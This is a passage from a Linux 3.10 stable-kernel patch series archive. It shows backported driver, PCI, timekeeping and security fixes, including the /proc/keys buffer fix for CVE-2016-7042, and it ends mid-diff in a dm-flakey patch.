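}
```

For the resource list MEM, IRQ, MEM, IRQ the loop index ends at 4 while
only 2 mapping slots are in use, so starting the dynamic regions at the
index would skip slots 2 and 3.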

Fixes: 0a0c3b5a24bd ("Add new uio device for dynamic memory allocation")

Signed-off-by: Jan Viktorin <viktorin@rehivetech.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/uio/uio_dmem_genirq.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/uio/uio_dmem_genirq.c b/drivers/uio/uio_dmem_genirq.c
index 252434c..2290b1f 100644
--- a/drivers/uio/uio_dmem_genirq.c
+++ b/drivers/uio/uio_dmem_genirq.c
@@ -229,7 +229,7 @@ static int uio_dmem_genirq_probe(struct platform_device *pdev)
 		++uiomem;
 	}
 
-	priv->dmem_region_start = i;
+	priv->dmem_region_start = uiomem - &uioinfo->mem[0];
 	priv->num_dmem_regions = pdata->num_dynamic_regions;
 
 	for (i = 0; i < pdata->num_dynamic_regions; ++i) {
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 302/319] KEYS: Fix short sprintf buffer in /proc/keys show function
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (200 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 301/319] uio: fix dmem_region_start computation Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 303/319] hv: do not lose pending heartbeat vmbus packets Willy Tarreau
                   ` (16 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: David Howells, James Morris, Willy Tarreau

From: David Howells <dhowells@redhat.com>

commit 03dab869b7b239c4e013ec82aea22e181e441cfc upstream.

This fixes CVE-2016-7042.

Fix a short sprintf buffer in proc_keys_show().  If the gcc stack protector
is turned on, this can cause a panic due to stack corruption.

The problem is that xbuf[] is not big enough to hold a 64-bit timeout
rendered as weeks:

	(gdb) p 0xffffffffffffffffULL/(60*60*24*7)
	$2 = 30500568904943

That's 14 chars plus NUL, not 11 chars plus NUL.

Expand the buffer to 16 chars.
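
The digit counts quoted above can be re-derived with a few lines of
userspace C. This is only an illustrative sketch: the helper names are
made up, and it counts decimal digits only, ignoring anything else the
real format string may append.

```c
#include <stdint.h>

#define SECS_PER_WEEK (60ULL * 60 * 24 * 7)

/* Number of decimal digits needed to print v. */
int decimal_digits(uint64_t v)
{
	int n = 1;

	while (v >= 10) {
		v /= 10;
		n++;
	}
	return n;
}

/* Digits needed for a timeout in seconds once it is rendered as weeks. */
int weeks_digits(uint64_t timeout_secs)
{
	return decimal_digits(timeout_secs / SECS_PER_WEEK);
}
```

A full 64-bit timeout needs 14 digits, a 32-bit one only 4, which is
consistent with the overflow showing up on 64-bit machines only.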

I think the unpatched code apparently works if the stack-protector is not
enabled because on a 32-bit machine the buffer won't be overflowed and on a
64-bit machine there's a 64-bit aligned pointer at one side and an int that
isn't checked again on the other side.

The panic incurred looks something like:

Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in: ffffffff81352ebe
CPU: 0 PID: 1692 Comm: reproducer Not tainted 4.7.2-201.fc24.x86_64 #1
Hardware name: Red Hat KVM, BIOS 0.5.1 01/01/2011
 0000000000000086 00000000fbbd2679 ffff8800a044bc00 ffffffff813d941f
 ffffffff81a28d58 ffff8800a044bc98 ffff8800a044bc88 ffffffff811b2cb6
 ffff880000000010 ffff8800a044bc98 ffff8800a044bc30 00000000fbbd2679
Call Trace:
 [<ffffffff813d941f>] dump_stack+0x63/0x84
 [<ffffffff811b2cb6>] panic+0xde/0x22a
 [<ffffffff81352ebe>] ? proc_keys_show+0x3ce/0x3d0
 [<ffffffff8109f7f9>] __stack_chk_fail+0x19/0x30
 [<ffffffff81352ebe>] proc_keys_show+0x3ce/0x3d0
 [<ffffffff81350410>] ? key_validate+0x50/0x50
 [<ffffffff8134db30>] ? key_default_cmp+0x20/0x20
 [<ffffffff8126b31c>] seq_read+0x2cc/0x390
 [<ffffffff812b6b12>] proc_reg_read+0x42/0x70
 [<ffffffff81244fc7>] __vfs_read+0x37/0x150
 [<ffffffff81357020>] ? security_file_permission+0xa0/0xc0
 [<ffffffff81246156>] vfs_read+0x96/0x130
 [<ffffffff81247635>] SyS_read+0x55/0xc0
 [<ffffffff817eb872>] entry_SYSCALL_64_fastpath+0x1a/0xa4

Reported-by: Ondrej Kozina <okozina@redhat.com>
Signed-off-by: David Howells <dhowells@redhat.com>
Tested-by: Ondrej Kozina <okozina@redhat.com>
Signed-off-by: James Morris <james.l.morris@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 security/keys/proc.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/security/keys/proc.c b/security/keys/proc.c
index 217b685..374c330 100644
--- a/security/keys/proc.c
+++ b/security/keys/proc.c
@@ -188,7 +188,7 @@ static int proc_keys_show(struct seq_file *m, void *v)
 	struct timespec now;
 	unsigned long timo;
 	key_ref_t key_ref, skey_ref;
-	char xbuf[12];
+	char xbuf[16];
 	int rc;
 
 	key_ref = make_key_ref(key, 0);
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 303/319] hv: do not lose pending heartbeat vmbus packets
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (201 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 302/319] KEYS: Fix short sprintf buffer in /proc/keys show function Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 304/319] staging: iio: ad5933: avoid uninitialized variable in error case Willy Tarreau
                   ` (15 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Long Li, K . Y . Srinivasan, Willy Tarreau

From: Long Li <longli@microsoft.com>

commit 407a3aee6ee2d2cb46d9ba3fc380bc29f35d020c upstream.

The host keeps sending heartbeat packets independent of the
guest responding to them.  Even though we respond to the heartbeat
messages at interrupt level, we can have situations where there may be
multiple heartbeat messages pending that have not been responded to.
For instance, this occurs when the VM is paused and the host continues
to send the heartbeat messages.  Address this issue by draining and
responding to all the heartbeat messages that may be pending.
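
A minimal userspace sketch of the difference between handling one packet
per callback and draining the channel. The channel type and receive
helper are hypothetical stand-ins, assuming a receive call that reports
a length of 0 once nothing is pending.

```c
#include <stddef.h>

struct fake_channel { int pending; };	/* hypothetical: packets waiting */

/* Hypothetical receive: returns the packet length, or 0 when empty. */
size_t fake_recvpacket(struct fake_channel *ch)
{
	if (ch->pending == 0)
		return 0;
	ch->pending--;
	return 64;
}

/* Old shape: at most one packet is answered per callback. */
int handle_once(struct fake_channel *ch)
{
	int replied = 0;

	if (fake_recvpacket(ch) > 0)
		replied++;
	return replied;
}

/* New shape: keep receiving until the channel reports no more data. */
int handle_drain(struct fake_channel *ch)
{
	int replied = 0;

	while (1) {
		size_t recvlen = fake_recvpacket(ch);

		if (!recvlen)
			break;
		replied++;
	}
	return replied;
}
```

With three packets queued, the first variant answers one and leaves two
pending; the second answers all three.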

Signed-off-by: Long Li <longli@microsoft.com>
Signed-off-by: K. Y. Srinivasan <kys@microsoft.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/hv/hv_util.c | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/drivers/hv/hv_util.c b/drivers/hv/hv_util.c
index 64c778f..5f69c83 100644
--- a/drivers/hv/hv_util.c
+++ b/drivers/hv/hv_util.c
@@ -244,10 +244,14 @@ static void heartbeat_onchannelcallback(void *context)
 	struct heartbeat_msg_data *heartbeat_msg;
 	u8 *hbeat_txf_buf = util_heartbeat.recv_buffer;
 
-	vmbus_recvpacket(channel, hbeat_txf_buf,
-			 PAGE_SIZE, &recvlen, &requestid);
+	while (1) {
+
+		vmbus_recvpacket(channel, hbeat_txf_buf,
+				 PAGE_SIZE, &recvlen, &requestid);
+
+		if (!recvlen)
+			break;
 
-	if (recvlen > 0) {
 		icmsghdrp = (struct icmsg_hdr *)&hbeat_txf_buf[
 				sizeof(struct vmbuspipe_hdr)];
 
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 304/319] staging: iio: ad5933: avoid uninitialized variable in error case
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (202 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 303/319] hv: do not lose pending heartbeat vmbus packets Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 305/319] mei: bus: fix received data size check in NFC fixup Willy Tarreau
                   ` (14 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Arnd Bergmann, Jonathan Cameron, Willy Tarreau

From: Arnd Bergmann <arnd@arndb.de>

commit 34eee70a7b82b09dbda4cb453e0e21d460dae226 upstream.

The ad5933_i2c_read function returns an error code to indicate
whether it could read data or not. However ad5933_work() ignores
this return code and just accesses the data unconditionally,
which gets detected by gcc as a possible bug:

drivers/staging/iio/impedance-analyzer/ad5933.c: In function 'ad5933_work':
drivers/staging/iio/impedance-analyzer/ad5933.c:649:16: warning: 'status' may be used uninitialized in this function [-Wmaybe-uninitialized]

This adds minimal error handling so we only evaluate the
data if it was correctly read.

Link: https://patchwork.kernel.org/patch/8110281/
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Acked-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/staging/iio/impedance-analyzer/ad5933.c | 17 ++++++++++-------
 1 file changed, 10 insertions(+), 7 deletions(-)

diff --git a/drivers/staging/iio/impedance-analyzer/ad5933.c b/drivers/staging/iio/impedance-analyzer/ad5933.c
index bc23d66..1ff1735 100644
--- a/drivers/staging/iio/impedance-analyzer/ad5933.c
+++ b/drivers/staging/iio/impedance-analyzer/ad5933.c
@@ -646,6 +646,7 @@ static void ad5933_work(struct work_struct *work)
 	struct iio_dev *indio_dev = i2c_get_clientdata(st->client);
 	signed short buf[2];
 	unsigned char status;
+	int ret;
 
 	mutex_lock(&indio_dev->mlock);
 	if (st->state == AD5933_CTRL_INIT_START_FREQ) {
@@ -653,19 +654,22 @@ static void ad5933_work(struct work_struct *work)
 		ad5933_cmd(st, AD5933_CTRL_START_SWEEP);
 		st->state = AD5933_CTRL_START_SWEEP;
 		schedule_delayed_work(&st->work, st->poll_time_jiffies);
-		mutex_unlock(&indio_dev->mlock);
-		return;
+		goto out;
 	}
 
-	ad5933_i2c_read(st->client, AD5933_REG_STATUS, 1, &status);
+	ret = ad5933_i2c_read(st->client, AD5933_REG_STATUS, 1, &status);
+	if (ret)
+		goto out;
 
 	if (status & AD5933_STAT_DATA_VALID) {
 		int scan_count = bitmap_weight(indio_dev->active_scan_mask,
 					       indio_dev->masklength);
-		ad5933_i2c_read(st->client,
+		ret = ad5933_i2c_read(st->client,
 				test_bit(1, indio_dev->active_scan_mask) ?
 				AD5933_REG_REAL_DATA : AD5933_REG_IMAG_DATA,
 				scan_count * 2, (u8 *)buf);
+		if (ret)
+			goto out;
 
 		if (scan_count == 2) {
 			buf[0] = be16_to_cpu(buf[0]);
@@ -677,8 +681,7 @@ static void ad5933_work(struct work_struct *work)
 	} else {
 		/* no data available - try again later */
 		schedule_delayed_work(&st->work, st->poll_time_jiffies);
-		mutex_unlock(&indio_dev->mlock);
-		return;
+		goto out;
 	}
 
 	if (status & AD5933_STAT_SWEEP_DONE) {
@@ -690,7 +693,7 @@ static void ad5933_work(struct work_struct *work)
 		ad5933_cmd(st, AD5933_CTRL_INC_FREQ);
 		schedule_delayed_work(&st->work, st->poll_time_jiffies);
 	}
-
+out:
 	mutex_unlock(&indio_dev->mlock);
 }
 
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 305/319] mei: bus: fix received data size check in NFC fixup
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (203 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 304/319] staging: iio: ad5933: avoid uninitialized variable in error case Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 306/319] ACPI / APEI: Fix incorrect return value of ghes_proc() Willy Tarreau
                   ` (13 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Alexander Usyskin, Tomas Winkler, Jiri Slaby, Willy Tarreau

From: Alexander Usyskin <alexander.usyskin@intel.com>

commit 582ab27a063a506ccb55fc48afcc325342a2deba upstream.

The NFC version reply size is checked only against the header size, not
against the full message size. That may potentially lead to uninitialized
memory access in version data.
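
The gap between the two checks can be sketched as follows. The sizes are
hypothetical and chosen only for illustration; the point is that a reply
which covers the header but not the payload passes the old test.

```c
/* Hypothetical sizes, chosen only for illustration. */
#define HDR_LEN   4	/* reply header */
#define VER_LEN  12	/* version payload that follows the header */

/* Old test: accepts any reply that at least covers the header. */
int old_check_ok(int bytes_recv)
{
	return !(bytes_recv < 0 || bytes_recv < HDR_LEN);
}

/* New test: the whole message (header + payload) must have arrived. */
int new_check_ok(int bytes_recv)
{
	return !(bytes_recv < HDR_LEN + VER_LEN);
}
```

A 4-byte reply is accepted by the old test and rejected by the new one;
negative error returns are rejected by both.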

That leads to warnings when version data is accessed:
drivers/misc/mei/bus-fixup.c: warning: '*((void *)&ver+11)' may be used uninitialized in this function [-Wuninitialized]:  => 212:2

Reported in
Build regressions/improvements in v4.9-rc3
https://lkml.org/lkml/2016/10/30/57

[js] the check is in 3.12 only once

Fixes: 59fcd7c63abf (mei: nfc: Initial nfc implementation)
Signed-off-by: Alexander Usyskin <alexander.usyskin@intel.com>
Signed-off-by: Tomas Winkler <tomas.winkler@intel.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/misc/mei/nfc.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/misc/mei/nfc.c b/drivers/misc/mei/nfc.c
index 4b7ea3f..1f8f856 100644
--- a/drivers/misc/mei/nfc.c
+++ b/drivers/misc/mei/nfc.c
@@ -292,7 +292,7 @@ static int mei_nfc_if_version(struct mei_nfc_dev *ndev)
 		return -ENOMEM;
 
 	bytes_recv = __mei_cl_recv(cl, (u8 *)reply, if_version_length);
-	if (bytes_recv < 0 || bytes_recv < sizeof(struct mei_nfc_reply)) {
+	if (bytes_recv < if_version_length) {
 		dev_err(&dev->pdev->dev, "Could not read IF version\n");
 		ret = -EIO;
 		goto err;
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 306/319] ACPI / APEI: Fix incorrect return value of ghes_proc()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (204 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 305/319] mei: bus: fix received data size check in NFC fixup Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 307/319] PCI: Handle read-only BARs on AMD CS553x devices Willy Tarreau
                   ` (12 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Punit Agrawal, Rafael J . Wysocki, Willy Tarreau

From: Punit Agrawal <punit.agrawal@arm.com>

commit 806487a8fc8f385af75ed261e9ab658fc845e633 upstream.

Although ghes_proc() tests for errors while reading the error status,
it always returns success (0). Fix this by propagating the return
value.

Fixes: d334a49113a4a33 (ACPI, APEI, Generic Hardware Error Source memory error support)
Signed-off-by: Punit Agrawal <punit.agrawal@arm.com>
Tested-by: Tyler Baicar <tbaicar@codeaurora.org>
Reviewed-by: Borislav Petkov <bp@suse.de>
[ rjw: Subject ]
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/acpi/apei/ghes.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/acpi/apei/ghes.c b/drivers/acpi/apei/ghes.c
index fcd7d91..070b843 100644
--- a/drivers/acpi/apei/ghes.c
+++ b/drivers/acpi/apei/ghes.c
@@ -647,7 +647,7 @@ static int ghes_proc(struct ghes *ghes)
 	ghes_do_proc(ghes, ghes->estatus);
 out:
 	ghes_clear_estatus(ghes);
-	return 0;
+	return rc;
 }
 
 static void ghes_add_timer(struct ghes *ghes)
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 307/319] PCI: Handle read-only BARs on AMD CS553x devices
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (205 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 306/319] ACPI / APEI: Fix incorrect return value of ghes_proc() Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 308/319] tile: avoid using clocksource_cyc2ns with absolute cycle count Willy Tarreau
                   ` (11 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Myron Stowe, Bjorn Helgaas, Jiri Slaby, Willy Tarreau

From: Myron Stowe <myron.stowe@redhat.com>

commit 06cf35f903aa6da0cc8d9f81e9bcd1f7e1b534bb upstream.

Some AMD CS553x devices have read-only BARs because of a firmware or
hardware defect.  There's a workaround in quirk_cs5536_vsa(), but it no
longer works after 36e8164882ca ("PCI: Restore detection of read-only
BARs").  Prior to 36e8164882ca, we filled in res->start; afterwards we
leave it zeroed out.  The quirk only updated the size, so the driver tried
to use a region starting at zero, which didn't work.

Expand quirk_cs5536_vsa() to read the base addresses from the BARs and
hard-code the sizes.

On Nix's system BAR 2's read-only value is 0x6200.  Prior to 36e8164882ca,
we interpreted that as a 512-byte BAR based on the lowest-order bit set.  Per
datasheet sec 5.6.1, that BAR (MFGPT) requires only 64 bytes; use that to
avoid clearing any address bits if a platform uses only 64-byte alignment.
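
The arithmetic behind the 512-byte versus 64-byte choice can be checked
with a short userspace sketch. The helper names are made up; the masking
expression is the usual power-of-two alignment, the same form the quirk
uses for its region.

```c
#include <stdint.h>

/* Isolate the lowest-order set bit, i.e. the size implied by a BAR value. */
uint32_t lowest_set_bit(uint32_t v)
{
	return v & (0u - v);
}

/* Clear the low bits of a base address for a power-of-two size. */
uint32_t align_base(uint32_t region, uint32_t size)
{
	return region & ~(size - 1u);
}
```

lowest_set_bit(0x6200) is 0x200, i.e. 512. A base such as 0x6240, which
is only 64-byte aligned, would be truncated to 0x6200 with a 512-byte
size but is preserved with a 64-byte size.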

[js] pcibios_bus_to_resource takes pdev, not bus in 3.12

[bhelgaas: changelog, reduce BAR 2 size to 64]
Fixes: 36e8164882ca ("PCI: Restore detection of read-only BARs")
Link: https://bugzilla.kernel.org/show_bug.cgi?id=85991#c4
Link: http://support.amd.com/TechDocs/31506_cs5535_databook.pdf
Link: http://support.amd.com/TechDocs/33238G_cs5536_db.pdf
Reported-and-tested-by: Nix <nix@esperi.org.uk>
Signed-off-by: Myron Stowe <myron.stowe@redhat.com>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/pci/quirks.c | 41 +++++++++++++++++++++++++++++++++++++----
 1 file changed, 37 insertions(+), 4 deletions(-)

diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
index a663715..b6625e5 100644
--- a/drivers/pci/quirks.c
+++ b/drivers/pci/quirks.c
@@ -339,19 +339,52 @@ static void quirk_s3_64M(struct pci_dev *dev)
 DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_S3,	PCI_DEVICE_ID_S3_868,		quirk_s3_64M);
 DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_S3,	PCI_DEVICE_ID_S3_968,		quirk_s3_64M);
 
+static void quirk_io(struct pci_dev *dev, int pos, unsigned size,
+		     const char *name)
+{
+	u32 region;
+	struct pci_bus_region bus_region;
+	struct resource *res = dev->resource + pos;
+
+	pci_read_config_dword(dev, PCI_BASE_ADDRESS_0 + (pos << 2), &region);
+
+	if (!region)
+		return;
+
+	res->name = pci_name(dev);
+	res->flags = region & ~PCI_BASE_ADDRESS_IO_MASK;
+	res->flags |=
+		(IORESOURCE_IO | IORESOURCE_PCI_FIXED | IORESOURCE_SIZEALIGN);
+	region &= ~(size - 1);
+
+	/* Convert from PCI bus to resource space */
+	bus_region.start = region;
+	bus_region.end = region + size - 1;
+	pcibios_bus_to_resource(dev, res, &bus_region);
+
+	dev_info(&dev->dev, FW_BUG "%s quirk: reg 0x%x: %pR\n",
+		 name, PCI_BASE_ADDRESS_0 + (pos << 2), res);
+}
+
 /*
  * Some CS5536 BIOSes (for example, the Soekris NET5501 board w/ comBIOS
  * ver. 1.33  20070103) don't set the correct ISA PCI region header info.
  * BAR0 should be 8 bytes; instead, it may be set to something like 8k
  * (which conflicts w/ BAR1's memory range).
+ *
+ * CS553x's ISA PCI BARs may also be read-only (ref:
+ * https://bugzilla.kernel.org/show_bug.cgi?id=85991 - Comment #4 forward).
  */
 static void quirk_cs5536_vsa(struct pci_dev *dev)
 {
+	static char *name = "CS5536 ISA bridge";
+
 	if (pci_resource_len(dev, 0) != 8) {
-		struct resource *res = &dev->resource[0];
-		res->end = res->start + 8 - 1;
-		dev_info(&dev->dev, "CS5536 ISA bridge bug detected "
-				"(incorrect header); workaround applied.\n");
+		quirk_io(dev, 0,   8, name);	/* SMB */
+		quirk_io(dev, 1, 256, name);	/* GPIO */
+		quirk_io(dev, 2,  64, name);	/* MFGPT */
+		dev_info(&dev->dev, "%s bug detected (incorrect header); workaround applied\n",
+			 name);
 	}
 }
 DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_CS5536_ISA, quirk_cs5536_vsa);
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 308/319] tile: avoid using clocksource_cyc2ns with absolute cycle count
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (206 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 307/319] PCI: Handle read-only BARs on AMD CS553x devices Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 309/319] dm flakey: fix reads to be issued if drop_writes configured Willy Tarreau
                   ` (10 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Chris Metcalf, Willy Tarreau

From: Chris Metcalf <cmetcalf@mellanox.com>

commit e658a6f14d7c0243205f035979d0ecf6c12a036f upstream.

For large values of "mult" and long uptimes, the intermediate
result of "cycles * mult" can overflow 64 bits.  For example,
the tile platform calls clocksource_cyc2ns with a 1.2 GHz clock;
we have mult = 853, and after 208.5 days, we overflow 64 bits.

Since clocksource_cyc2ns() is intended to be used for relative
cycle counts, not absolute cycle counts, performance is more
important than accepting a wider range of cycle values.  So,
just use mult_frac() directly in tile's sched_clock().
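
The overflow and the quotient/remainder split can be reproduced in
userspace. This is a sketch with made-up function names; the shift of 10
is an assumption, inferred from 853/1024 being roughly the 0.833 ns per
cycle of a 1.2 GHz clock.

```c
#include <stdint.h>

/* Naive conversion: the product cycles * mult can wrap around 64 bits. */
uint64_t cyc2ns_naive(uint64_t cycles, uint32_t mult, uint32_t shift)
{
	return (cycles * mult) >> shift;
}

/*
 * Quotient/remainder split in the style of mult_frac(): the large part
 * is divided before it is multiplied, so intermediate values stay small.
 */
uint64_t cyc2ns_frac(uint64_t cycles, uint64_t numer, uint64_t denom)
{
	uint64_t quot = cycles / denom;
	uint64_t rem = cycles % denom;

	return quot * numer + (rem * numer) / denom;
}

/* Days of uptime until cycles * mult exceeds 2^64 at clock rate hz. */
double days_until_overflow(double hz, uint32_t mult)
{
	return 18446744073709551616.0 / mult / hz / 86400.0;
}
```

For small cycle counts both conversions agree (1200 cycles give 999 ns
either way). For a count of 2^62 the naive product wraps, while the
split version still returns 853 * 2^52. days_until_overflow(1.2e9, 853)
comes out just under 208.6 days, in line with the figure quoted above.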

Commit 4cecf6d401a0 ("sched, x86: Avoid unnecessary overflow
in sched_clock") by Salman Qazi results in essentially the same
generated code for x86 as this change does for tile.  In fact,
a follow-on change by Salman introduced mult_frac() and switched
to using it, so the C code was largely identical at that point too.

Peter Zijlstra then added mul_u64_u32_shr() and switched x86
to use it.  This is, in principle, better; by optimizing the
64x64->64 multiplies to be 32x32->64 multiplies we can potentially
save some time.  However, the compiler pipelines the 64x64->64
multiplies pretty well, and the conditional branch in the generic
mul_u64_u32_shr() causes some bubbles in execution, with the
result that it's pretty much a wash.  If tilegx provided its own
implementation of mul_u64_u32_shr() without the conditional branch,
we could potentially save 3 cycles, but that seems like a small gain
for a fair amount of additional build scaffolding; no other platform
currently provides a mul_u64_u32_shr() override, and tile doesn't
currently have an <asm/div64.h> header to put the override in.

Additionally, gcc currently has an optimization bug that prevents
it from recognizing the opportunity to use a 32x32->64 multiply,
and so the result would be no better than the existing mult_frac()
until such time as the compiler is fixed.

For now, just using mult_frac() seems like the right answer.

Signed-off-by: Chris Metcalf <cmetcalf@mellanox.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 arch/tile/kernel/time.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/arch/tile/kernel/time.c b/arch/tile/kernel/time.c
index 5ac397e..9df6d0d 100644
--- a/arch/tile/kernel/time.c
+++ b/arch/tile/kernel/time.c
@@ -215,8 +215,8 @@ void do_timer_interrupt(struct pt_regs *regs, int fault_num)
  */
 unsigned long long sched_clock(void)
 {
-	return clocksource_cyc2ns(get_cycles(),
-				  sched_clock_mult, SCHED_CLOCK_SHIFT);
+	return mult_frac(get_cycles(),
+			 sched_clock_mult, 1ULL << SCHED_CLOCK_SHIFT);
 }
 
 int setup_profiling_timer(unsigned int multiplier)
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 309/319] dm flakey: fix reads to be issued if drop_writes configured
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (207 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 308/319] tile: avoid using clocksource_cyc2ns with absolute cycle count Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 310/319] mm,ksm: fix endless looping in allocating memory when ksm enable Willy Tarreau
                   ` (9 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Mike Snitzer, Willy Tarreau

From: Mike Snitzer <snitzer@redhat.com>

commit 299f6230bc6d0ccd5f95bb0fb865d80a9c7d5ccc upstream.

v4.8-rc3 commit 99f3c90d0d ("dm flakey: error READ bios during the
down_interval") overlooked the 'drop_writes' feature, which is meant to
allow reads to be issued rather than errored, during the down_interval.
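
The intended handling of reads at map time during the down_interval can
be summarised as a small decision function. This is a simplified sketch
with hypothetical names; it mirrors only the condition used at map time
and leaves out the later per-bio checks done at completion.

```c
#include <stdbool.h>

enum read_action { READ_ERROR, READ_MAP };

/*
 * Decide what to do with a read during the down interval:
 * error it only if neither corruption nor drop_writes is configured.
 */
enum read_action down_interval_read(bool corrupt_bio_byte_set, bool drop_writes)
{
	if (!corrupt_bio_byte_set && !drop_writes)
		return READ_ERROR;

	return READ_MAP;
}
```

With drop_writes configured and no corruption requested, the read is
mapped rather than errored, which is the case the earlier commit missed.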

Fixes: 99f3c90d0d ("dm flakey: error READ bios during the down_interval")
Reported-by: Qu Wenruo <quwenruo@cn.fujitsu.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/md/dm-flakey.c | 27 ++++++++++++++++-----------
 1 file changed, 16 insertions(+), 11 deletions(-)

diff --git a/drivers/md/dm-flakey.c b/drivers/md/dm-flakey.c
index a9a47cd..ace01a3 100644
--- a/drivers/md/dm-flakey.c
+++ b/drivers/md/dm-flakey.c
@@ -286,15 +286,13 @@ static int flakey_map(struct dm_target *ti, struct bio *bio)
 		pb->bio_submitted = true;
 
 		/*
-		 * Map reads as normal only if corrupt_bio_byte set.
+		 * Error reads if neither corrupt_bio_byte or drop_writes are set.
+		 * Otherwise, flakey_end_io() will decide if the reads should be modified.
 		 */
 		if (bio_data_dir(bio) == READ) {
-			/* If flags were specified, only corrupt those that match. */
-			if (fc->corrupt_bio_byte && (fc->corrupt_bio_rw == READ) &&
-			    all_corrupt_bio_flags_match(bio, fc))
-				goto map_bio;
-			else
